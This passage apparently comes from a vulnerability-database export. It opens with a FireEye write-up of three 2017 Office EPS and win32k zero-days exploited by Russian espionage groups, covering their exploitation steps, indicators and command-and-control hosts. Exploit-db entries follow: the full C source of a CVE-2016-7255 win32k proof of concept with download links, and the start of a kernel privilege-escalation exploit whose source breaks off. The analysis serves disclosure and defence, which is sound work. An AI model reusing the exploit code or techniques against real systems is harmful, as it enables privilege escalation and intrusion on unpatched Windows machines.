One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. 
Each EPS zero-day is paired with an EOP exploit: the shellcode runs inside the sandbox that hosts the FLTLDR.EXE instance used for EPS processing, and the EOP is required to escape it.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 was used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nWhen the Office document is opened, FLTLDR.EXE, the filter loader process that hosts the EPS import filter, is used to render the embedded EPS image, which contains the exploit. The EPS file is a PostScript program that triggers a use-after-free in the \u201c_restore_\u201d operator.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. 
**restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual describes, the _restore_ operator reclaims memory allocated since the matching _save_. Combined with the _forall_ operator, which keeps iterating over an array after a _restore_ executed inside its procedure has freed that array, this yields a use-after-free. Figure 1 shows pseudo code for the exploit's use of save and restore.\n\nFigure 1: Pseudo code for the exploit\n\nThe following steps let the pseudo code leak object metadata and build a read/write primitive:\n\n 1. forall_proc is created as an array whose single element is restore_proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save, so it belongs to the memory that restore will reclaim\n 4. The forall operator loops over the elements of uaf_array, calling forall_proc for each element\n 5. The first element of uaf_array is passed to restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the saved state, freeing uaf_array\n * calls alloc_string, which reclaims the memory that held uaf_array\n * updates forall_proc to call leak_proc\n 7. forall continues iterating over the stale uaf_array, calling leak_proc on each element; the elements now contain the objects that alloc_string placed there\n\nFigure 2 shows a debug log of uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy controlling the allocations made after the _save_ operator, the attacker shapes the memory layout and turns the use-after-free into a read/write primitive. Figure 3 shows the forged string object: its length field is set to 0x7fffffff and its base address to 0, so indexing into it reads or writes any user-mode address.\n\nFigure 3: Faked String Object\n\nWith arbitrary read and write of user memory, the EPS program continues by searching for gadgets to build a ROP chain and creates a forged **_file_** object. 
Figure 4 shows the forged file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling the **_closefile_** operator on the forged file object, the exploit pivots the stack into the ROP chain and starts the shellcode. Figure 5 shows part of the disassembly of the **_closefile_** operator handler.\n\nFigure 5: Stack pivot in the disassembly of closefile\n\nOnce execution has been achieved, the ROP chain changes the memory protection of the region containing the shellcode so that it is executable. At this point the shellcode is running inside the sandbox that hosts FLTLDR.EXE, and an elevation of privilege is required to escape it.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by using 32- or 64-bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first-stage payload to profile a target system and establish command and control. Since early 2016, we have observed multiple iterations of SHIRIME in the wild; the most recent version (v1.0.1004) was employed in this zero-day.\n\nThe second document, Confirmation_letter.docx, continues by using 32- or 64-bit versions of CVE-2016-7255 to escalate privileges before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs within these documents used different logic to construct the ROP chain and build the shellcode. 
The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confusion in the procedure operand of the _forall_ operator: the operator uses the operand as a procedure without verifying its type, which lets an attacker alter the execution flow and push values of their choosing onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays memory with predefined data to occupy a specific memory address and facilitate exploitation. Figure 7 shows the PostScript code snippet that sprays memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the string content occupies memory at address 0x0d80d000, producing the memory layout shown in Figure 8. The exploit leverages this layout and content to forge a procedure object and manipulate the code flow so that predefined values (highlighted in yellow) are stored to the operand stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit executes a statement of the form _1 array 16#D80D020 forall_. This creates a one-element array, supplies the integer 16#D80D020 (0x0D80D020, an address inside the sprayed region) where _forall_ expects a procedure, and calls the _forall_ operator. While _forall_ executes the forged procedure, the exploit precisely controls the execution flow to push attacker-chosen values onto the operand stack. Figure 9 shows the main code path that consumes the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter _forall_ completes, the contents of the operand stack are under the attacker's control. 
This is shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent _exch_ operations define objects from the data on the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nA18 is a string object whose length field is 0x7ffffff0 and whose base is 0, giving the same read/write primitive as the forged string in the previous exploit. Its in-memory layout is shown in Figure 12.\n\nFigure 12: A18 String Object\n\nA19 is an array object whose member values are all deliberately crafted. The exploit defines another array object and uses _put_ to store it into the forged array A19, which writes the new array object's pointer into A19. The exploit can then read directly from the predictable address 0xD80D020 + 0x38, leak the object's vftable pointer, and infer the base address of EPSIMP32.flt. Figure 13 shows the code snippet that leaks the EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack when the _put_ operator is called, and the forged array A19 after the _put_ operation completes.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW-primitive string and the leaked module base of EPSIMP32, the exploit continues by searching for ROP gadgets, creating a fake file object, and pivoting to the shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file object and the disassembly of the pivot to the ROP chain and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP vulnerability, CVE-2017-0263, to escalate privileges and escape the sandbox running FLTLDR.EXE, and then drops and executes a GAMEFISH payload. 
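The forall type confusion described above can be modelled in a few lines of C. The block below is an added illustration, not code from FireEye's post or from EPSIMP32.flt: a tagged-object model, a forall that follows the procedure operand's pointer payload without checking the tag (the bug class), and one that type-checks both operands first. The spray is a static struct whose forged procedure header sits 0x20 bytes past its base, mirroring 0x0D80D020 = 0x0D80D000 + 0x20; because the demo runs under ASLR it uses the struct's real address rather than a fixed one, and the object layouts and the 0x41414141 / 0x42424242 values are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdio.h>

/* Minimal tagged-object model of a PostScript operand (added example; the real
 * EPSIMP32 object layout is not known from the post and is not reproduced).   */
typedef enum { T_NULL, T_INT, T_ARRAY, T_PROC } ps_type;
typedef struct ps_obj ps_obj;
typedef struct { size_t len; ps_obj *items; } ps_seq;          /* storage of arrays and procedures */
struct ps_obj { ps_type type; union { int64_t i; ps_seq *seq; } v; };

#define STACK_MAX 32
typedef struct { ps_obj s[STACK_MAX]; size_t n; } ps_stack;

static bool push(ps_stack *st, ps_obj o) {
    if (st->n >= STACK_MAX) return false;
    st->s[st->n++] = o;
    return true;
}

/* "Executing" a procedure in this toy: the current element is pushed, then every
 * integer literal in the procedure body is pushed onto the operand stack.      */
static void exec_proc(ps_stack *st, const ps_seq *proc, ps_obj elem) {
    push(st, elem);
    for (size_t i = 0; i < proc->len; i++)
        if (proc->items[i].type == T_INT) push(st, proc->items[i]);
}

/* Vulnerable forall: uses the pointer payload of the second operand without
 * checking that it is a procedure. An integer operand is therefore treated as
 * the address of a procedure body, which is the type confusion of CVE-2017-0262. */
static int forall_vulnerable(ps_stack *st, ps_obj arr, ps_obj proc) {
    const ps_seq *body = proc.v.seq;               /* no tag check: v.i is reinterpreted as v.seq */
    for (size_t i = 0; i < arr.v.seq->len; i++) exec_proc(st, body, arr.v.seq->items[i]);
    return 0;
}

/* Hardened forall: both operands are type-checked before any pointer is followed. */
static int forall_checked(ps_stack *st, ps_obj arr, ps_obj proc) {
    if (arr.type != T_ARRAY || proc.type != T_PROC) return -1;   /* typecheck error */
    for (size_t i = 0; i < arr.v.seq->len; i++) exec_proc(st, proc.v.seq, arr.v.seq->items[i]);
    return 0;
}

/* The sprayed region: filler, then at +0x20 the forged procedure header, whose
 * items pointer leads to forged integer objects further inside the same spray. */
static struct {
    uint8_t pad0[0x20];
    ps_seq  forged_proc;                           /* at spray base + 0x20 (cf. 0x0D80D020) */
    uint8_t pad1[0x40 - 0x20 - sizeof(ps_seq)];
    ps_obj  forged_items[2];                       /* at spray base + 0x40 */
} spray;

static void setup_spray(void) {
    spray.forged_items[0].type = T_INT; spray.forged_items[0].v.i = 0x41414141;  /* assumed values */
    spray.forged_items[1].type = T_INT; spray.forged_items[1].v.i = 0x42424242;
    spray.forged_proc.len   = 2;
    spray.forged_proc.items = spray.forged_items;
}

/* Models "1 array 16#D80D020 forall": a one-element array and an integer whose
 * value is the forged procedure's address. Returns the top of the operand stack. */
static int64_t demo_confused(void) {
    setup_spray();
    ps_stack st; st.n = 0;
    ps_obj   null_elem = { T_NULL, { .i = 0 } };
    ps_seq   arr_body  = { 1, &null_elem };
    ps_obj   arr       = { T_ARRAY, { .seq = &arr_body } };
    ps_obj   confused  = { T_INT, { .i = (int64_t)(uintptr_t)&spray.forged_proc } };
    forall_vulnerable(&st, arr, confused);
    return st.n ? st.s[st.n - 1].v.i : -1;       /* attacker-chosen 0x42424242 is now on the stack */
}

/* Same operands against the checked forall: rejected before the pointer is followed. */
static int demo_checked(void) {
    setup_spray();
    ps_stack st; st.n = 0;
    ps_obj   null_elem = { T_NULL, { .i = 0 } };
    ps_seq   arr_body  = { 1, &null_elem };
    ps_obj   arr       = { T_ARRAY, { .seq = &arr_body } };
    ps_obj   confused  = { T_INT, { .i = (int64_t)(uintptr_t)&spray.forged_proc } };
    return forall_checked(&st, arr, confused);
}

int main(void) {
    printf("confused forall left 0x%llx on the stack\n", (unsigned long long)demo_confused());
    printf("checked forall returned %d\n", demo_checked());
    return 0;
}
```

The interesting property is that the vulnerable path never writes out of bounds: it only reads a structure the attacker placed at a predictable address, which is why a heap spray plus a single unchecked type tag is enough to seed the operand stack with the values that later become the A18 and A19 forgeries.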
Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\nFigure 16: Suspending Threads\n\nThe exploit then checks the OS version and uses that information to populate version-specific fields such as the token offset, syscall number, etc. An executable memory area is allocated and populated with kernel-mode shellcode as well as the address information required by the shellcode. A new thread is created to trigger the vulnerability and control the rest of the exploitation.\n\nThe exploit starts by creating three popup menus and appending menus to them, as shown in Figure 17. It creates 0x100 windows with random class names. The User32!HMValidateHandle trick is used to leak tagWnd addresses, which serve as the kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function that calls DestroyWindow on the windows in the table populated by EventHookProc (explained later in this post). This function also shows the first popup menu, which was created earlier.\n\nTwo additional windows are created with the class name \u201cMain_Window_Class\u201d. SetWindowLong is used to change the WndProc of the second window, wnd2, to the shellcode address. An application-defined hook, WindowHookProc, and an event hook, EventHookProc, are installed with SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to the first window, wnd1.\n\nEventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for the **SysShadow** class name and sets a new WndProc for the corresponding window. 
Inside this WndProc, the NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free occurs during WM_NCDESTROY handling in the kernel and overwrites wnd2\u2019s tagWnd structure, setting the bServerSideWindowProc flag. With bServerSideWindowProc set, the user-mode WndProc is treated as a kernel callback and is invoked from kernel context; in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode verifies that the memory corruption has occurred by checking that the code segment register does not hold the user-mode code segment selector, i.e. that it is executing in kernel mode. It also checks that the message sent is 0x9f9f. Once validation is complete, the shellcode finds the TOKEN address of the current process and the TOKEN of the System process (PID 4). The shellcode then copies the System process\u2019 token to the current process, which elevates the current process to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days, with examples seen both before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. 
Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n| **MD5** | **Filename** | **C2 Host** |\n|---|---|---|\n| 2abe3cc4bff46455a945d56c27e9fb45 | Confirmation_letter.docx.bin (NETWIRE) | 84.200.2.12 |\n| e091425d23b8db6082b40d25e938f871 | Confirmation_letter.docx (NETWIRE) | 138.201.44.30 |\n| 006bdb19b6936329bffd4054e270dc6a | Confirmation_letter_ACM.docx (NETWIRE) | 185.106.122.113 |\n| 15660631e31c1172ba5a299a90938c02 | st07383.en17.docx (SHIRIME) | tnsc.webredirect.org |\n| f8e92d8b5488ea76c40601c8f1a08790 | Trump's_Attack_on_Syria_English.docx (GAMEFISH) | wmdmediacodecs.com |\n\nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "modified": "2017-05-09T13:00:00", "published": 
"2017-05-09T13:00:00", "id": "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-10T01:30:30", "description": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135). CVE-2016-7255. 
Dos exploit for Windows platform", "published": "2016-11-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EDB-ID:40745", "href": "https://www.exploit-db.com/exploits/40745/", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\nFull Proof of Concept:\r\n\r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n\r\n********************************************************************\r\n Created:\t2016-11-09 14:23:09\r\n Filename: \tmain.c\r\n Author:\troot[at]TinySec.net\r\n Version\t0.0.0.1\r\n Purpose:\tpoc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... 
);\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList=NULL;\r\n\tULONG ulRet = 0;\r\n\t\r\n\tdo \r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\t\t\r\n\t\tva_start(VaList,Format);\r\n\t\t\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\t\t\r\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\t\t\r\n\t\tva_end(VaList);\r\n\t\t\r\n\t} while (FALSE);\r\n\t\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\t\r\n\treturn ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = 0;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n\t int i = 0;\r\n\t \r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\t\t \r\n\t\t\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\t\t\t \r\n\t\t _sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \t \r\n\t\t \r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n \r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n\t int i = 0;\r\n\t HWND hWnd = NULL;\r\n\r\n\r\n\t int 
nFinalRet = -1;\r\n\r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\r\n\r\n\t\t for ( i = 0; i < nCount ; i++)\r\n\t\t {\r\n\t\t\t _sim_key_down( VK_TAB);\r\n\t\t\t _sim_key_up( VK_TAB);\r\n\t\t\t \r\n\t\t\t Sleep(1000);\r\n\r\n\t\t }\r\n\t\r\n\t\t \r\n\t\t_sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \r\n\t } while (FALSE);\r\n\t \r\n\t return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = {0};\r\n\r\n\tHWND\thWndParent = NULL;\r\n\tHWND\thWndChild = NULL;\r\n\r\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\r\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid*\tpId = NULL;\r\n\tMSG\t\tstMsg = {0};\r\n\r\n\tdo \r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\t\t\r\n\t\tif ( 0 == RegisterClassExW(&stWC) )\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\t\t\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t#ifdef _WIN64\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \r\n\t\t#else\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \r\n\t\t#endif // #ifdef _WIN64\r\n\t\t\r\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , 
hWndChild);\r\n\t\tDebugBreak();\r\n\r\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild , GetDesktopWindow() );\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\t\t\r\n\t\tSwitchToThisWindow(hWndChild , TRUE);\r\n\t\t\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\r\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\r\n\t\t{\t\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t}\r\n\t\r\n\r\n\t} while (FALSE);\r\n\r\n\tif ( NULL != hWndParent )\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif ( NULL != hWndChild )\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n\treturn 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n\tdo \r\n\t{\r\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\r\n\t} while (FALSE);\r\n\t\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40745/"}, {"lastseen": "2017-01-11T17:58:55", "description": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2). CVE-2016-7255. 
Local exploit for Windows platform", "published": "2017-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EDB-ID:41015", "href": "https://www.exploit-db.com/exploits/41015/", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n\r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n\r\n// ricklarabee.blogspot.com\r\n\r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n\r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n\r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\r\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n\r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n\r\n#define STATUS_SUCCESS 
((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n\r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n 